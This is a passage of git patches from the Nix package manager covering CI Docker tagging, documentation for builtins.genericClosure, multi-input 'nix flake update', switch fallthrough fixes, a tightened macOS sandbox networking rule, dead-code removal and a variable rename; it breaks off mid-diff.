 .github/workflows/ci.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index fdd2d67f6..38126dd68 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -153,6 +153,8 @@ jobs:
         IMAGE_ID=$(echo $IMAGE_ID | tr '[A-Z]' '[a-z]')
 
         docker tag nix:$NIX_VERSION $IMAGE_ID:$NIX_VERSION
-        docker tag nix:$NIX_VERSION $IMAGE_ID:master
+        docker tag nix:$NIX_VERSION $IMAGE_ID:latest
         docker push $IMAGE_ID:$NIX_VERSION
+        docker push $IMAGE_ID:latest
+        # deprecated 2024-02-24
         docker push $IMAGE_ID:master

From d83008c3a797c8e4ec1e1a97c5b1bc5e6b02c561 Mon Sep 17 00:00:00 2001
From: Johannes Kirschbauer 
Date: Sat, 24 Feb 2024 19:34:53 +0700
Subject: [PATCH 509/654] documentation: clarify genericClosure (#10003)

* doc: clarify genericClosure documentation

Co-authored-by: Valentin Gagarin 
---
 src/libexpr/primops.cc | 63 ++++++++++++++++++++++++++----------------
 1 file changed, 39 insertions(+), 24 deletions(-)

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 835afba82..850cc7a45 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -705,38 +705,53 @@ static RegisterPrimOp primop_genericClosure(PrimOp {
     .args = {"attrset"},
     .arity = 1,
     .doc = R"(
-      Take an *attrset* with values named `startSet` and `operator` in order to
-      return a *list of attrsets* by starting with the `startSet` and recursively
-      applying the `operator` function to each `item`. The *attrsets* in the
-      `startSet` and the *attrsets* produced by `operator` must contain a value
-      named `key` which is comparable. The result is produced by calling `operator`
-      for each `item` with a value for `key` that has not been called yet including
-      newly produced `item`s. The function terminates when no new `item`s are
-      produced. The resulting *list of attrsets* contains only *attrsets* with a
-      unique key. For example,
+      `builtins.genericClosure` iteratively computes the transitive closure over an arbitrary relation defined by a function.
 
-      ```
-      builtins.genericClosure {
-        startSet = [ {key = 5;} ];
-        operator = item: [{
-          key = if (item.key / 2 ) * 2 == item.key
-               then item.key / 2
-               else 3 * item.key + 1;
-        }];
-      }
-      ```
-      evaluates to
-      ```
-      [ { key = 5; } { key = 16; } { key = 8; } { key = 4; } { key = 2; } { key = 1; } ]
-      ```
+      It takes *attrset* with two attributes named `startSet` and `operator`, and returns a list of attrbute sets:
+
+      - `startSet`:
+        The initial list of attribute sets.
+
+      - `operator`:
+        A function that takes an attribute set and returns a list of attribute sets.
+        It defines how each item in the current set is processed and expanded into more items.
+
+      Each attribute set in the list `startSet` and the list returned by `operator` must have an attribute `key`, which must support equality comparison.
+      The value of `key` can be one of the following types:
 
-      `key` can be one of the following types:
       - [Number](@docroot@/language/values.md#type-number)
       - [Boolean](@docroot@/language/values.md#type-boolean)
       - [String](@docroot@/language/values.md#type-string)
       - [Path](@docroot@/language/values.md#type-path)
       - [List](@docroot@/language/values.md#list)
 
+      The result is produced by calling the `operator` on each `item` that has not been called yet, including newly added items, until no new items are added.
+      Items are compared by their `key` attribute.
+
+      Common usages are:
+
+      - Generating unique collections of items, such as dependency graphs.
+      - Traversing through structures that may contain cycles or loops.
+      - Processing data structures with complex internal relationships.
+
+      > **Example**
+      >
+      > ```nix
+      > builtins.genericClosure {
+      >   startSet = [ {key = 5;} ];
+      >   operator = item: [{
+      >     key = if (item.key / 2 ) * 2 == item.key
+      >          then item.key / 2
+      >          else 3 * item.key + 1;
+      >   }];
+      > }
+      > ```
+      >
+      > evaluates to
+      >
+      > ```nix
+      > [ { key = 5; } { key = 16; } { key = 8; } { key = 4; } { key = 2; } { key = 1; } ]
+      > ```
       )",
     .fun = prim_genericClosure,
 });

From 9f11b1b0c4724ad81f91f14756b475e0de64379f Mon Sep 17 00:00:00 2001
From: Olmo Kramer 
Date: Sat, 24 Feb 2024 20:58:44 +0100
Subject: [PATCH 510/654] Accept multiple inputs in `nix flake update`

---
 src/nix/flake.cc | 22 ++++++++++++----------
 1 file changed, 12 insertions(+), 10 deletions(-)

diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 131589f35..de23a122d 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -88,17 +88,19 @@ public:
         expectArgs({
             .label="inputs",
             .optional=true,
-            .handler={[&](std::string inputToUpdate){
-                InputPath inputPath;
-                try {
-                    inputPath = flake::parseInputPath(inputToUpdate);
-                } catch (Error & e) {
-                    warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
-                    throw e;
+            .handler={[&](std::vector inputsToUpdate){
+                for (auto inputToUpdate : inputsToUpdate) {
+                    InputPath inputPath;
+                    try {
+                        inputPath = flake::parseInputPath(inputToUpdate);
+                    } catch (Error & e) {
+                        warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
+                        throw e;
+                    }
+                    if (lockFlags.inputUpdates.contains(inputPath))
+                        warn("Input '%s' was specified multiple times. You may have done this by accident.");
+                    lockFlags.inputUpdates.insert(inputPath);
                 }
-                if (lockFlags.inputUpdates.contains(inputPath))
-                    warn("Input '%s' was specified multiple times. You may have done this by accident.");
-                lockFlags.inputUpdates.insert(inputPath);
             }},
             .completer = {[&](AddCompletions & completions, size_t, std::string_view prefix) {
                 completeFlakeInputPath(completions, getEvalState(), getFlakeRefsForCompletion(), prefix);

From a82aeedb5b9e24c9788febab3dcf65169b79cece Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Sat, 24 Feb 2024 15:52:16 -0800
Subject: [PATCH 511/654] Warn on implicit switch case fallthrough

This seems to have found one actual bug in fs-sink.cc: the symlink case
was falling into the regular file case, which can't possibly be
intentional, right?
---
 Makefile               | 2 +-
 src/libexpr/lexer.l    | 3 +++
 src/libutil/fs-sink.cc | 2 ++
 3 files changed, 6 insertions(+), 1 deletion(-)

diff --git a/Makefile b/Makefile
index d3542c3e9..f8689c8cf 100644
--- a/Makefile
+++ b/Makefile
@@ -81,7 +81,7 @@ ifdef HOST_WINDOWS
   GLOBAL_LDFLAGS += -Wl,--export-all-symbols
 endif
 
-GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src
+GLOBAL_CXXFLAGS += -g -Wall -Wimplicit-fallthrough -include $(buildprefix)config.h -std=c++2a -I src
 
 # Include the main lib, causing rules to be defined
 
diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l
index 380048c77..5b26d6927 100644
--- a/src/libexpr/lexer.l
+++ b/src/libexpr/lexer.l
@@ -94,6 +94,9 @@ static StringToken unescapeStr(SymbolTable & symbols, char * s, size_t length)
 
 }
 
+// yacc generates code that uses unannotated fallthrough.
+#pragma GCC diagnostic ignored "-Wimplicit-fallthrough"
+
 #define YY_USER_INIT initLoc(yylloc)
 #define YY_USER_ACTION adjustLoc(yylloc, yytext, yyleng);
 
diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc
index 95b6088da..35ce0ac36 100644
--- a/src/libutil/fs-sink.cc
+++ b/src/libutil/fs-sink.cc
@@ -15,6 +15,7 @@ void copyRecursive(
     case SourceAccessor::tSymlink:
     {
         sink.createSymlink(to, accessor.readLink(from));
+        break;
     }
 
     case SourceAccessor::tRegular:
@@ -38,6 +39,7 @@ void copyRecursive(
                 sink, to + "/" + name);
             break;
         }
+        break;
     }
 
     case SourceAccessor::tMisc:

From d60c3f7f7c83134b5b4470ed84b6d5ed38e28753 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Simon=20=C5=BDlender?= 
Date: Sun, 25 Feb 2024 23:00:57 +0100
Subject: [PATCH 512/654] Fix __darwinAllowLocalNetworking sandbox

The sandbox rule `(allow network* (local ip))` doesn't do what it
implies. Adding this rule permits all network traffic. We should be
matching on (remote ip "localhost:*")` instead.
---
 src/libstore/build/sandbox-defaults.sb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/build/sandbox-defaults.sb b/src/libstore/build/sandbox-defaults.sb
index 25ec11285..2ad5fb616 100644
--- a/src/libstore/build/sandbox-defaults.sb
+++ b/src/libstore/build/sandbox-defaults.sb
@@ -45,7 +45,7 @@ R""(
 ; allow it if the package explicitly asks for it.
 (if (param "_ALLOW_LOCAL_NETWORKING")
     (begin
-      (allow network* (local ip) (local tcp) (local udp))
+      (allow network* (remote ip "localhost:*"))
 
       ; Allow access to /etc/resolv.conf (which is a symlink to
       ; /private/var/run/resolv.conf).

From 8ac4542593e583e86009d953d89f8683f7eef9fb Mon Sep 17 00:00:00 2001
From: Yueh-Shun Li 
Date: Mon, 26 Feb 2024 17:59:07 +0800
Subject: [PATCH 513/654] .gitignore: ignore historical test binaries

After commit 91b6833686a6 (" Move tests to separate directories, and
document"), previously-built test executables are now tracked by Git,
which is annoying for developers.

This patch add .gitignore rules to ignore the obsolete test directories
to solve such problem and enhance developer experience.
---
 .gitignore | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/.gitignore b/.gitignore
index a0a0786ed..5c1136823 100644
--- a/.gitignore
+++ b/.gitignore
@@ -45,13 +45,16 @@ perl/Makefile.config
 /src/libexpr/parser-tab.hh
 /src/libexpr/parser-tab.output
 /src/libexpr/nix.tbl
+/src/libexpr/tests
 /tests/unit/libexpr/libnixexpr-tests
 
 # /src/libstore/
 *.gen.*
+/src/libstore/tests
 /tests/unit/libstore/libnixstore-tests
 
 # /src/libutil/
+/src/libutil/tests
 /tests/unit/libutil/libnixutil-tests
 
 /src/nix/nix

From 219705ff64cc3411bc92b88fe369cd2999604986 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Mon, 26 Feb 2024 11:04:19 +0100
Subject: [PATCH 514/654] Remove dead code

Most of the code in `git.{cc,hh}` is dead, so get rid of it.
---
 src/libutil/fs-sink.cc    |  46 ------
 src/libutil/fs-sink.hh    |   7 -
 src/libutil/git.cc        | 289 --------------------------------------
 src/libutil/git.hh        | 152 --------------------
 tests/unit/libutil/git.cc | 205 ---------------------------
 5 files changed, 699 deletions(-)

diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc
index 35ce0ac36..0ebd750f6 100644
--- a/src/libutil/fs-sink.cc
+++ b/src/libutil/fs-sink.cc
@@ -5,52 +5,6 @@
 
 namespace nix {
 
-void copyRecursive(
-    SourceAccessor & accessor, const CanonPath & from,
-    FileSystemObjectSink & sink, const Path & to)
-{
-    auto stat = accessor.lstat(from);
-
-    switch (stat.type) {
-    case SourceAccessor::tSymlink:
-    {
-        sink.createSymlink(to, accessor.readLink(from));
-        break;
-    }
-
-    case SourceAccessor::tRegular:
-    {
-        sink.createRegularFile(to, [&](CreateRegularFileSink & crf) {
-            if (stat.isExecutable)
-                crf.isExecutable();
-            accessor.readFile(from, crf, [&](uint64_t size) {
-                crf.preallocateContents(size);
-            });
-        });
-        break;
-    }
-
-    case SourceAccessor::tDirectory:
-    {
-        sink.createDirectory(to);
-        for (auto & [name, _] : accessor.readDirectory(from)) {
-            copyRecursive(
-                accessor, from / name,
-                sink, to + "/" + name);
-            break;
-        }
-        break;
-    }
-
-    case SourceAccessor::tMisc:
-        throw Error("file '%1%' has an unsupported type", from);
-
-    default:
-        abort();
-    }
-}
-
-
 struct RestoreSinkSettings : Config
 {
     Setting preallocateContents{this, false, "preallocate-contents",
diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh
index ae577819a..670b55c2b 100644
--- a/src/libutil/fs-sink.hh
+++ b/src/libutil/fs-sink.hh
@@ -41,13 +41,6 @@ struct FileSystemObjectSink
     virtual void createSymlink(const Path & path, const std::string & target) = 0;
 };
 
-/**
- * Recursively copy file system objects from the source into the sink.
- */
-void copyRecursive(
-    SourceAccessor & accessor, const CanonPath & sourcePath,
-    FileSystemObjectSink & sink, const Path & destPath);
-
 /**
  * Ignore everything and do nothing
  */
diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 5733531fa..029e1af44 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -5,302 +5,13 @@
 #include 
 #include  // for strcasecmp
 
-#include "signals.hh"
-#include "config.hh"
-#include "hash.hh"
-#include "posix-source-accessor.hh"
-
 #include "git.hh"
-#include "serialise.hh"
 
 namespace nix::git {
 
 using namespace nix;
 using namespace std::string_literals;
 
-std::optional decodeMode(RawMode m) {
-    switch (m) {
-        case (RawMode) Mode::Directory:
-        case (RawMode) Mode::Executable:
-        case (RawMode) Mode::Regular:
-        case (RawMode) Mode::Symlink:
-            return (Mode) m;
-        default:
-            return std::nullopt;
-    }
-}
-
-
-static std::string getStringUntil(Source & source, char byte)
-{
-    std::string s;
-    char n[1];
-    source(std::string_view { n, 1 });
-    while (*n != byte) {
-        s += *n;
-        source(std::string_view { n, 1 });
-    }
-    return s;
-}
-
-
-static std::string getString(Source & source, int n)
-{
-    std::string v;
-    v.resize(n);
-    source(v);
-    return v;
-}
-
-void parseBlob(
-    FileSystemObjectSink & sink,
-    const Path & sinkPath,
-    Source & source,
-    bool executable,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-
-    sink.createRegularFile(sinkPath, [&](auto & crf) {
-        if (executable)
-            crf.isExecutable();
-
-        unsigned long long size = std::stoi(getStringUntil(source, 0));
-
-        crf.preallocateContents(size);
-
-        unsigned long long left = size;
-        std::string buf;
-        buf.reserve(65536);
-
-        while (left) {
-            checkInterrupt();
-            buf.resize(std::min((unsigned long long)buf.capacity(), left));
-            source(buf);
-            crf(buf);
-            left -= buf.size();
-        }
-    });
-}
-
-void parseTree(
-    FileSystemObjectSink & sink,
-    const Path & sinkPath,
-    Source & source,
-    std::function hook,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    unsigned long long size = std::stoi(getStringUntil(source, 0));
-    unsigned long long left = size;
-
-    sink.createDirectory(sinkPath);
-
-    while (left) {
-        std::string perms = getStringUntil(source, ' ');
-        left -= perms.size();
-        left -= 1;
-
-        RawMode rawMode = std::stoi(perms, 0, 8);
-        auto modeOpt = decodeMode(rawMode);
-        if (!modeOpt)
-            throw Error("Unknown Git permission: %o", perms);
-        auto mode = std::move(*modeOpt);
-
-        std::string name = getStringUntil(source, '\0');
-        left -= name.size();
-        left -= 1;
-
-        std::string hashs = getString(source, 20);
-        left -= 20;
-
-        Hash hash(HashAlgorithm::SHA1);
-        std::copy(hashs.begin(), hashs.end(), hash.hash);
-
-        hook(name, TreeEntry {
-            .mode = mode,
-            .hash = hash,
-        });
-    }
-}
-
-ObjectType parseObjectType(
-    Source & source,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-
-    auto type = getString(source, 5);
-
-    if (type == "blob ") {
-        return ObjectType::Blob;
-    } else if (type == "tree ") {
-        return ObjectType::Tree;
-    } else throw Error("input doesn't look like a Git object");
-}
-
-void parse(
-    FileSystemObjectSink & sink,
-    const Path & sinkPath,
-    Source & source,
-    bool executable,
-    std::function hook,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-
-    auto type = parseObjectType(source, xpSettings);
-
-    switch (type) {
-    case ObjectType::Blob:
-        parseBlob(sink, sinkPath, source, executable, xpSettings);
-        break;
-    case ObjectType::Tree:
-        parseTree(sink, sinkPath, source, hook, xpSettings);
-        break;
-    default:
-        assert(false);
-    };
-}
-
-
-std::optional convertMode(SourceAccessor::Type type)
-{
-    switch (type) {
-    case SourceAccessor::tSymlink:   return Mode::Symlink;
-    case SourceAccessor::tRegular:   return Mode::Regular;
-    case SourceAccessor::tDirectory: return Mode::Directory;
-    case SourceAccessor::tMisc:      return std::nullopt;
-    default: abort();
-    }
-}
-
-
-void restore(FileSystemObjectSink & sink, Source & source, std::function hook)
-{
-    parse(sink, "", source, false, [&](Path name, TreeEntry entry) {
-        auto [accessor, from] = hook(entry.hash);
-        auto stat = accessor->lstat(from);
-        auto gotOpt = convertMode(stat.type);
-        if (!gotOpt)
-            throw Error("file '%s' (git hash %s) has an unsupported type",
-                from,
-                entry.hash.to_string(HashFormat::Base16, false));
-        auto & got = *gotOpt;
-        if (got != entry.mode)
-            throw Error("git mode of file '%s' (git hash %s) is %o but expected %o",
-                from,
-                entry.hash.to_string(HashFormat::Base16, false),
-                (RawMode) got,
-                (RawMode) entry.mode);
-        copyRecursive(
-            *accessor, from,
-            sink, name);
-    });
-}
-
-
-void dumpBlobPrefix(
-    uint64_t size, Sink & sink,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-    auto s = fmt("blob %d\0"s, std::to_string(size));
-    sink(s);
-}
-
-
-void dumpTree(const Tree & entries, Sink & sink,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-
-    std::string v1;
-
-    for (auto & [name, entry] : entries) {
-        auto name2 = name;
-        if (entry.mode == Mode::Directory) {
-            assert(name2.back() == '/');
-            name2.pop_back();
-        }
-        v1 += fmt("%o %s\0"s, static_cast(entry.mode), name2);
-        std::copy(entry.hash.hash, entry.hash.hash + entry.hash.hashSize, std::back_inserter(v1));
-    }
-
-    {
-        auto s = fmt("tree %d\0"s, v1.size());
-        sink(s);
-    }
-
-    sink(v1);
-}
-
-
-Mode dump(
-    SourceAccessor & accessor, const CanonPath & path,
-    Sink & sink,
-    std::function hook,
-    PathFilter & filter,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    auto st = accessor.lstat(path);
-
-    switch (st.type) {
-    case SourceAccessor::tRegular:
-    {
-        accessor.readFile(path, sink, [&](uint64_t size) {
-            dumpBlobPrefix(size, sink, xpSettings);
-        });
-        return st.isExecutable
-            ? Mode::Executable
-            : Mode::Regular;
-    }
-
-    case SourceAccessor::tDirectory:
-    {
-        Tree entries;
-        for (auto & [name, _] : accessor.readDirectory(path)) {
-            auto child = path / name;
-            if (!filter(child.abs())) continue;
-
-            auto entry = hook(child);
-
-            auto name2 = name;
-            if (entry.mode == Mode::Directory)
-                name2 += "/";
-
-            entries.insert_or_assign(std::move(name2), std::move(entry));
-        }
-        dumpTree(entries, sink, xpSettings);
-        return Mode::Directory;
-    }
-
-    case SourceAccessor::tSymlink:
-    case SourceAccessor::tMisc:
-    default:
-        throw Error("file '%1%' has an unsupported type", path);
-    }
-}
-
-
-TreeEntry dumpHash(
-        HashAlgorithm ha,
-        SourceAccessor & accessor, const CanonPath & path, PathFilter & filter)
-{
-    std::function hook;
-    hook = [&](const CanonPath & path) -> TreeEntry {
-        auto hashSink = HashSink(ha);
-        auto mode = dump(accessor, path, hashSink, hook, filter);
-        auto hash = hashSink.finish().first;
-        return {
-            .mode = mode,
-            .hash = hash,
-        };
-    };
-
-    return hook(path);
-}
-
-
 std::optional parseLsRemoteLine(std::string_view line)
 {
     const static std::regex line_regex("^(ref: *)?([^\\s]+)(?:\\t+(.*))?$");
diff --git a/src/libutil/git.hh b/src/libutil/git.hh
index d9eb138e1..dea351929 100644
--- a/src/libutil/git.hh
+++ b/src/libutil/git.hh
@@ -5,160 +5,8 @@
 #include 
 #include 
 
-#include "types.hh"
-#include "serialise.hh"
-#include "hash.hh"
-#include "source-accessor.hh"
-#include "fs-sink.hh"
-
 namespace nix::git {
 
-enum struct ObjectType {
-    Blob,
-    Tree,
-    //Commit,
-    //Tag,
-};
-
-using RawMode = uint32_t;
-
-enum struct Mode : RawMode {
-    Directory = 0040000,
-    Regular = 0100644,
-    Executable = 0100755,
-    Symlink = 0120000,
-};
-
-std::optional decodeMode(RawMode m);
-
-/**
- * An anonymous Git tree object entry (no name part).
- */
-struct TreeEntry
-{
-    Mode mode;
-    Hash hash;
-
-    GENERATE_CMP(TreeEntry, me->mode, me->hash);
-};
-
-/**
- * A Git tree object, fully decoded and stored in memory.
- *
- * Directory names must end in a `/` for sake of sorting. See
- * https://github.com/mirage/irmin/issues/352
- */
-using Tree = std::map;
-
-/**
- * Callback for processing a child hash with `parse`
- *
- * The function should
- *
- * 1. Obtain the file system objects denoted by `gitHash`
- *
- * 2. Ensure they match `mode`
- *
- * 3. Feed them into the same sink `parse` was called with
- *
- * Implementations may seek to memoize resources (bandwidth, storage,
- * etc.) for the same Git hash.
- */
-using SinkHook = void(const Path & name, TreeEntry entry);
-
-/**
- * Parse the "blob " or "tree " prefix.
- *
- * @throws if prefix not recognized
- */
-ObjectType parseObjectType(
-    Source & source,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-void parseBlob(
-    FileSystemObjectSink & sink, const Path & sinkPath,
-    Source & source,
-    bool executable,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-void parseTree(
-    FileSystemObjectSink & sink, const Path & sinkPath,
-    Source & source,
-    std::function hook,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Helper putting the previous three `parse*` functions together.
- */
-void parse(
-    FileSystemObjectSink & sink, const Path & sinkPath,
-    Source & source,
-    bool executable,
-    std::function hook,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Assists with writing a `SinkHook` step (2).
- */
-std::optional convertMode(SourceAccessor::Type type);
-
-/**
- * Simplified version of `SinkHook` for `restore`.
- *
- * Given a `Hash`, return a `SourceAccessor` and `CanonPath` pointing to
- * the file system object with that path.
- */
-using RestoreHook = std::pair(Hash);
-
-/**
- * Wrapper around `parse` and `RestoreSink`
- */
-void restore(FileSystemObjectSink & sink, Source & source, std::function hook);
-
-/**
- * Dumps a single file to a sink
- *
- * @param xpSettings for testing purposes
- */
-void dumpBlobPrefix(
-    uint64_t size, Sink & sink,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Dumps a representation of a git tree to a sink
- */
-void dumpTree(
-    const Tree & entries, Sink & sink,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Callback for processing a child with `dump`
- *
- * The function should return the Git hash and mode of the file at the
- * given path in the accessor passed to `dump`.
- *
- * Note that if the child is a directory, its child in must also be so
- * processed in order to compute this information.
- */
-using DumpHook = TreeEntry(const CanonPath & path);
-
-Mode dump(
-    SourceAccessor & accessor, const CanonPath & path,
-    Sink & sink,
-    std::function hook,
-    PathFilter & filter = defaultPathFilter,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Recursively dumps path, hashing as we go.
- *
- * A smaller wrapper around `dump`.
- */
-TreeEntry dumpHash(
-            HashAlgorithm ha,
-            SourceAccessor & accessor, const CanonPath & path,
-            PathFilter & filter = defaultPathFilter);
-
 /**
  * A line from the output of `git ls-remote --symref`.
  *
diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc
index 76ef86bcf..73bbd049e 100644
--- a/tests/unit/libutil/git.cc
+++ b/tests/unit/libutil/git.cc
@@ -9,211 +9,6 @@ namespace nix {
 
 using namespace git;
 
-class GitTest : public CharacterizationTest
-{
-    Path unitTestData = getUnitTestData() + "/git";
-
-public:
-
-    Path goldenMaster(std::string_view testStem) const override {
-        return unitTestData + "/" + testStem;
-    }
-
-    /**
-     * We set these in tests rather than the regular globals so we don't have
-     * to worry about race conditions if the tests run concurrently.
-     */
-    ExperimentalFeatureSettings mockXpSettings;
-
-private:
-
-    void SetUp() override
-    {
-        mockXpSettings.set("experimental-features", "git-hashing");
-    }
-};
-
-TEST(GitMode, gitMode_directory) {
-    Mode m = Mode::Directory;
-    RawMode r = 0040000;
-    ASSERT_EQ(static_cast(m), r);
-    ASSERT_EQ(decodeMode(r), std::optional { m });
-};
-
-TEST(GitMode, gitMode_executable) {
-    Mode m = Mode::Executable;
-    RawMode r = 0100755;
-    ASSERT_EQ(static_cast(m), r);
-    ASSERT_EQ(decodeMode(r), std::optional { m });
-};
-
-TEST(GitMode, gitMode_regular) {
-    Mode m = Mode::Regular;
-    RawMode r = 0100644;
-    ASSERT_EQ(static_cast(m), r);
-    ASSERT_EQ(decodeMode(r), std::optional { m });
-};
-
-TEST(GitMode, gitMode_symlink) {
-    Mode m = Mode::Symlink;
-    RawMode r = 0120000;
-    ASSERT_EQ(static_cast(m), r);
-    ASSERT_EQ(decodeMode(r), std::optional { m });
-};
-
-TEST_F(GitTest, blob_read) {
-    readTest("hello-world-blob.bin", [&](const auto & encoded) {
-        StringSource in { encoded };
-        StringSink out;
-        RegularFileSink out2 { out };
-        ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob);
-        parseBlob(out2, "", in, false, mockXpSettings);
-
-        auto expected = readFile(goldenMaster("hello-world.bin"));
-
-        ASSERT_EQ(out.s, expected);
-    });
-}
-
-TEST_F(GitTest, blob_write) {
-    writeTest("hello-world-blob.bin", [&]() {
-        auto decoded = readFile(goldenMaster("hello-world.bin"));
-        StringSink s;
-        dumpBlobPrefix(decoded.size(), s, mockXpSettings);
-        s(decoded);
-        return s.s;
-    });
-}
-
-/**
- * This data is for "shallow" tree tests. However, we use "real" hashes
- * so that we can check our test data in a small shell script test test
- * (`tests/unit/libutil/data/git/check-data.sh`).
- */
-const static Tree tree = {
-    {
-        "Foo",
-        {
-            .mode = Mode::Regular,
-            // hello world with special chars from above
-            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
-        },
-    },
-    {
-        "bAr",
-        {
-            .mode = Mode::Executable,
-            // ditto
-            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
-        },
-    },
-    {
-        "baZ/",
-        {
-            .mode = Mode::Directory,
-            // Empty directory hash
-            .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1),
-        },
-    },
-};
-
-TEST_F(GitTest, tree_read) {
-    readTest("tree.bin", [&](const auto & encoded) {
-        StringSource in { encoded };
-        NullFileSystemObjectSink out;
-        Tree got;
-        ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Tree);
-        parseTree(out, "", in, [&](auto & name, auto entry) {
-            auto name2 = name;
-            if (entry.mode == Mode::Directory)
-                name2 += '/';
-            got.insert_or_assign(name2, std::move(entry));
-        }, mockXpSettings);
-
-        ASSERT_EQ(got, tree);
-    });
-}
-
-TEST_F(GitTest, tree_write) {
-    writeTest("tree.bin", [&]() {
-        StringSink s;
-        dumpTree(tree, s, mockXpSettings);
-        return s.s;
-    });
-}
-
-TEST_F(GitTest, both_roundrip) {
-    using File = MemorySourceAccessor::File;
-
-    MemorySourceAccessor files;
-    files.root = File::Directory {
-        .contents {
-            {
-                "foo",
-                File::Regular {
-                    .contents = "hello\n\0\n\tworld!",
-                },
-            },
-            {
-                "bar",
-                File::Directory {
-                    .contents = {
-                        {
-                            "baz",
-                            File::Regular {
-                                .executable = true,
-                                .contents = "good day,\n\0\n\tworld!",
-                            },
-                        },
-                    },
-                },
-            },
-        },
-    };
-
-    std::map cas;
-
-    std::function dumpHook;
-    dumpHook = [&](const CanonPath & path) {
-        StringSink s;
-        HashSink hashSink { HashAlgorithm::SHA1 };
-        TeeSink s2 { s, hashSink };
-        auto mode = dump(
-            files, path, s2, dumpHook,
-            defaultPathFilter, mockXpSettings);
-        auto hash = hashSink.finish().first;
-        cas.insert_or_assign(hash, std::move(s.s));
-        return TreeEntry {
-            .mode = mode,
-            .hash = hash,
-        };
-    };
-
-    auto root = dumpHook(CanonPath::root);
-
-    MemorySourceAccessor files2;
-
-    MemorySink sinkFiles2 { files2 };
-
-    std::function mkSinkHook;
-    mkSinkHook = [&](auto prefix, auto & hash, auto executable) {
-        StringSource in { cas[hash] };
-        parse(
-            sinkFiles2, prefix, in, executable,
-            [&](const Path & name, const auto & entry) {
-                mkSinkHook(
-                    prefix + "/" + name,
-                    entry.hash,
-                    entry.mode == Mode::Executable);
-            },
-            mockXpSettings);
-    };
-
-    mkSinkHook("", root.hash, false);
-
-    ASSERT_EQ(files, files2);
-}
-
 TEST(GitLsRemote, parseSymrefLineWithReference) {
     auto line = "ref: refs/head/main	HEAD";
     auto res = parseLsRemoteLine(line);

From fd47f76da9752d0bec35e58525e5aacfd3e7dd26 Mon Sep 17 00:00:00 2001
From: Yueh-Shun Li 
Date: Mon, 26 Feb 2024 02:04:20 +0800
Subject: [PATCH 515/654] treewide: hash type -> hash algorithm

"hash type" -> "hash algorithm" in all comments, documentation, and
messages.

ht -> ha, [Hh]ashType -> [HhashAlgo] for all local variables and
function arguments. No API change is made.

Continuation of 5334c9c792a2 and 837b889c4154.
---
 src/libstore/content-address.cc     | 6 +++---
 src/libstore/content-address.hh     | 8 ++++----
 src/libstore/derivations.cc         | 2 +-
 src/libstore/globals.hh             | 4 ++--
 src/libutil/file-content-address.cc | 4 ++--
 src/libutil/file-content-address.hh | 4 ++--
 src/libutil/hash.cc                 | 2 +-
 src/libutil/hash.hh                 | 4 ++--
 8 files changed, 17 insertions(+), 17 deletions(-)

diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc
index 2091f8e02..4e3d2f64d 100644
--- a/src/libstore/content-address.cc
+++ b/src/libstore/content-address.cc
@@ -111,10 +111,10 @@ static std::pair parseContentAddressMethodP
     }
 
     auto parseHashAlgorithm_ = [&](){
-        auto hashTypeRaw = splitPrefixTo(rest, ':');
-        if (!hashTypeRaw)
+        auto hashAlgoRaw = splitPrefixTo(rest, ':');
+        if (!hashAlgoRaw)
             throw UsageError("content address hash must be in form ':', but found: %s", wholeInput);
-        HashAlgorithm hashAlgo = parseHashAlgo(*hashTypeRaw);
